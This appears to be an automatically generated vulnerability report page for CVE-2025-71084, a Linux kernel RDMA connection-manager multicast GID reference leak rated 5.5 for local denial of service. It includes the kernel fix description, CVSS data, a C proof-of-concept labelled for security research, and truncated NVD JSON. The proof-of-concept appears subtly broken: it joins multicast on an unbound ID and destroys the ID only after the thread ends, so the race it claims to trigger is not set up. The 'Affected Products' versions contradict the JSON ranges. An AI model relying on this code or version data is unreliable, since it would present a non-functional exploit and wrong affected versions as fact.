Security Vulnerability Report
CVE-2025-71084 CVSS 5.5 MEDIUM

CVE-2025-71084

Published: 2026-01-13 16:16:08
Last Modified: 2026-03-25 19:33:27
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

RDMA/cm: Fix leaking the multicast GID table reference

If the CM ID is destroyed while the CM event for multicast creating is still queued the cancel_work_sync() will prevent the work from running which also prevents destroying the ah_attr. This leaks a refcount and triggers a WARN:

  GID entry ref leak for dev syz1 index 2 ref=573
  WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]
  WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886

Destroy the ah_attr after canceling the work, it is safe to call this twice.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.15 (stable branch commit: 3ba6d01c4b3c584264dc733c6a2ecc5bbc8e0bb5)
Linux Kernel < 5.10 (stable branch commit: 57f3cb6c84159d12ba343574df2115fb18dd83ca)
Linux Kernel < 5.4 (stable branch commit: 5cb34bb5fd726491b809efbeb5cfd63ae5bf9cf3)
Linux Kernel < 4.19 (stable branch commit: ab668a58c4a2ccb6d54add7a76f2f955d15d0196)
Linux Kernel < 4.14 (stable branch commit: abf38398724ecc888f62c678d288da40d11878af)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <stdio.h>
#include <arpa/inet.h>   /* htons(), inet_addr() */
#include <rdma/rdma_cma.h>
#include <rdma/ib_verbs.h>
#include <pthread.h>
#include <unistd.h>

/* PoC for CVE-2025-71084: RDMA/cm multicast GID table reference leak
 * This demonstrates triggering the condition where CM ID is destroyed
 * while multicast creation event is still queued.
 */

volatile int destroy_now = 0;

void* work_thread(void* arg) {
    struct rdma_cm_id *id = (struct rdma_cm_id*)arg;

    /* Simulate multicast join operation that queues work */
    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(12345);
    addr.sin_addr.s_addr = inet_addr("224.0.0.1");

    /* This queues work for multicast GID registration */
    rdma_join_multicast(id, (struct sockaddr*)&addr, NULL);

    /* Signal that work is queued */
    while (!destroy_now) {
        usleep(1000);
    }
    return NULL;
}

int main() {
    struct rdma_event_channel *ec = NULL;
    struct rdma_cm_id *id = NULL;
    pthread_t tid;

    /* Initialize RDMA resources */
    ec = rdma_create_event_channel();
    if (!ec) {
        fprintf(stderr, "Failed to create event channel\n");
        return 1;
    }

    if (rdma_create_id(ec, &id, NULL, RDMA_PS_TCP)) {
        fprintf(stderr, "Failed to create CM ID\n");
        return 1;
    }

    /* Start thread that queues multicast work */
    pthread_create(&tid, NULL, work_thread, id);

    /* Give time for work to be queued */
    usleep(50000);

    /* Destroy CM ID while multicast work is queued
     * This triggers cancel_work_sync() preventing ah_attr cleanup
     * and causes reference leak
     */
    destroy_now = 1;
    pthread_join(tid, NULL);
    rdma_destroy_id(id);
    rdma_destroy_event_channel(ec);

    printf("Check dmesg for: GID entry ref leak warning\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71084", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:08.007", "lastModified": "2026-03-25T19:33:26.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nRDMA/cm: Soluciona la fuga de la referencia de la tabla GID de multidifusión\n\nSi el ID de CM es destruido mientras el evento de CM para la creación de multidifusión aún está en cola, la función cancel_work_sync() evitará que el trabajo se ejecute, lo que también impide destruir el ah_attr. 
Esto provoca una fuga de refcount y activa una ADVERTENCIA:\n\n Fuga de referencia de entrada GID para dev syz1 índice 2 ref=573\n ADVERTENCIA: CPU: 1 PID: 655 en drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n ADVERTENCIA: CPU: 1 PID: 655 en drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestruir el ah_attr después de cancelar el trabajo; es seguro llamar a esto dos veces."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.20", "versionEndExcluding": "5.10.248", "matchCriteriaId": "E02EDAC5-9D90-49EA-AFE8-04DB188472C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11.3", "versionEndExcluding": "5.12", "matchCriteriaId": "1F7C7012-9E04-4106-8340-6697917F40CF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.12.1", "versionEndExcluding": "5.15.198", "matchCriteriaId": "3BA018E1-5321-421F-A291-0912B82BB7E0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.160", "matchCriteriaId": 
"C10CC03E-16A9-428A-B449-40D3763E15F6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.120", "matchCriteriaId": "43C3A206-5EEE-417B-AA0F-EF8972E7A9F0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.64", "matchCriteriaId": "32BF4A52-377C-44ED-B5E6-7EA5D896E98B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.4", "matchCriteriaId": "DC988EA0-0E32-457A-BF95-89BEB31A227B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.12:-:*:*:*:*:*:*", "matchCriteriaId": "75EB504D-4A83-4C67-9C8D-FD9C6C8EB4CD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kern ... (truncated)